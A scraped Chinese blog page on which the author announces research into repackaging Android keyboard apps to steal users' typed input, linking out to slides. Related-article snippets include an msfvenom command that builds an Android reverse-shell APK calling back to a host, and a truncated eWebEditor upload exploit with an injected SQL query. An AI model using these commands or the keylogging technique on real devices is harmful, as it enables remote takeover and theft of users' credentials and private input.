A new way to hack android app info

最新推荐文章于 2015-12-09 15:12:05 发布
最新推荐文章于 2015-12-09 15:12:05 发布
阅读量148 收藏
点赞数
分类专栏: android hacker 文章标签: 移动开发
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wcf1987/article/details/84352808
版权

最近新研究了一种android攻击手段,blog发到团队那里的blog了,这里就给个链接和ppt下载吧

 写道
http://insight-labs.org/?p=587

 

效果截图和评价



 利用对输入法的重打包,来实现窃取用户信息的方式,优点在于权限要求非常之低,只要求一个网络权限就可以窃取各种各样的用户输入信息了,而反观各种输入法他们自身申请的权限已经非常之高了。而且窃取的信息中包含的hinttext和包名又可以方便的帮助我们定位到具体的apk和输入框信息

 详细内容见ppt附件
wcf1987
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
使用Frida来hack安卓APP(二)-crackme.pdf
08-19
在第一篇介绍了Frida之后,我们现在打算来介绍如何使用Frida来解决简单的crackme。由于我们已经学习了关于 Frida的一些知识,所以说,这一部分应该是简单的(理论上)。
[可用]android hack
weixin_34247155的博客
02-19 256
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.237 LPORT=4444 R > shell.apk service apache2 start mv shell.apk /var/www/html msfconsole use exploit/multi/handler set payload android/m...
读《50 Android Hacks》笔记整理Hack 35~Hack 40
自由畅想者的专栏
12-09 678
Intent系统是Android提供的优秀特性之一。如果开发者想与另一个应用程序共享信息,就可以使用Intent;如果开发者想打开一个链接也可以使用Intent。在Android中,几乎所有操作都可以通过Intent完成。
A new way to hack android app password public.pptx
11-01
### 一、Android应用中的敏感信息 #### 1. 敏感信息类型 - **通讯录**:包括联系人的姓名、电话号码等个人信息。 - **通讯记录**:通话记录,包含拨打、接听及未接来电的信息。 - **短信**:接收与发送的短信内容。...
Advanced Android App Architecture 9781942878698.pdf
04-29
Android has such a rich development ecosystem, which allows developers to develop apps in any way they please. However, with this level of freedom, scaling apps can be a mess. You’ve heard developers...
Android App增量更新详解及实例代码
01-05
Android App增量更新实例–Smart App Updates  介绍  你所看到的,是一个用于Android应用程序增量更新的开源库。...Smart app updates is a new feature of Google Play that introduces a better way of deliver
python 反编译 pyc 一些心得
ice
09-06 2887
0x01 , 现在用python的人也多了起来,代码安全始终是我们要考虑的问题,比如说我们要将我们的成果发布出去,py直接发布肯定是不行的(除非你是开源的),那么我们就只能考虑发布pyc文件了,     0x02,今天讨论的就是怎么反编译pyc到源代码的技术,从道理上来讲,这个是完全没问题的,而且反编译出来的代码质量应该相当高才对(参考java class的原理),在百度里面搜索的话,信息量...
密码字典
ice
02-16 1744
这是我根据前一段各种密码门做的一个密码字典(大概通过3亿多账号统计出来的,当然有重复,也有数据不规整),我给大家放出来一部分高频密码统计  ...
metasploit 图形化界面和自动化exploit脚本
ice
10-21 1684
0x01 最新版的metasploit没了图形化界面,              armitage开始收费              那我们就选用msfgui吧,安装简单                https://raw.github.com/scriptjunkie/msfgui/master/msfgui-installer.exe               下载安装就可以了 ...
ewebeditor 3.8 任意文件上传漏洞解析
ice
11-09 1156
   首先这个是别人早都发出来的一个漏洞,exp也写好了,如下 <title>eWebeditoR3.8 for php任意文件上EXP</title> <form action="" method=post enctype="multipart/form-data"> <INPUT TYPE="hidden" name="MAX_F
APKTool签名的一个问题
ice
10-14 717
0x01 昨天写了反编译,今天就写下签名的问题   0x02 apktool的重打包功能大家都知道,堪称神器,各类破解人事必备之良器,          用法不多说,只说签名容易遇到的问题 0x03 创建私钥仓库这个事情就不多说,方法很多,eclipse和keytool       都有类似功能         需要注意的是,这个私钥仓库一共有两个密码,一个是私钥仓库的密码(stor...
android恶意程序分析 (一)
ice
03-29 712
  决定了毕设做android安全方向的相关内容,那么每天一篇android恶意软件分析是少不了。今天就是第一篇 首先介绍个网站 http://contagiominidump.blogspot.com/ 非常好的一个网站,主要是他隔三差五的会放出个android恶意软件,我的分析就是基于他给出的apk文件。 注意要FQ       android.dds.com-STiNiTER...
CVE 2012 0507 分析
ice
12-17 671
0x01 https://github.com/wchen-r7/metasploit-framework/blob/791ebdb679d53f6363cf88a54db57722719cd62a/external/source/exploits/CVE-2012-0507/Exploit.java   这里就是java的cve 2012 0507的poc所在了,大部分网上流传的基本上...
ewebeditor上传漏洞
ice
10-10 660
<H3>ewebeditor asp版 2.1.6 上传漏洞利用程序----</H3><br><br> <form action="http://xxxx/include/wedit/upload.asp?action=save&type=IMAGE&style=standard' and 1=2 union select S...
CVE-2013-0422 分析2
ice
01-11 572
0x01 http://wcf1987.iteye.com/blog/1749088 这是对CVE-2012-0507的分析 http://wcf1987.iteye.com/blog/1768355这是对CVE-2013-0422的分析 本文则是java的cve-2013-0422的分析,其实看poc感觉上就跟CVE-2012-0507有几分相似的地方,都是最终利用了definecl...
phpcms v9 爆密码
ice
07-25 481
   1.首先是http://www.wooyun.org/bugs/wooyun-2010-010072       有人报告phpcms v9 直接爆密码     开始我还比较迷惑,因为我记得我看过phpcms v9 的管理员密码体系是有salt的,光爆密码没啥用啊?     2.后面有人指出了是和前一个http://www.wooyun.org/bugs/wooyun-2010-09...
phpspy2010 绕过登陆漏洞解析
ice
09-25 477
    phpspy2010可谓是webshell界很不错的一个工具,但是phpspy2010 和2011相继爆出了绕过认证漏洞,我简单分析下php2010的绕过漏洞,首先据说只有php2010的加密版才有这个漏洞,我大概看了下官方解释,估计也只有加密版才有这个问题,而且看上去应该是个失误。。。       下面具体分析:附件是2010的源代码,由于是加密的eval执行base64解密, 把e...
APKTool打包的一个小问题
ice
10-13 376
0x01,又开始写blog了,好久没有网络了,最近终于可以开始继续研究技术了。           今天的问题是大家再用到APKTool时估计常见的一个问题,           在windows下,用APKTool进行打包时,有时会爆这个错误,甚至我们在反编译完没经过任何改动的时候,直接重打包也会遇到            I: Smaling... I: Building reso...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值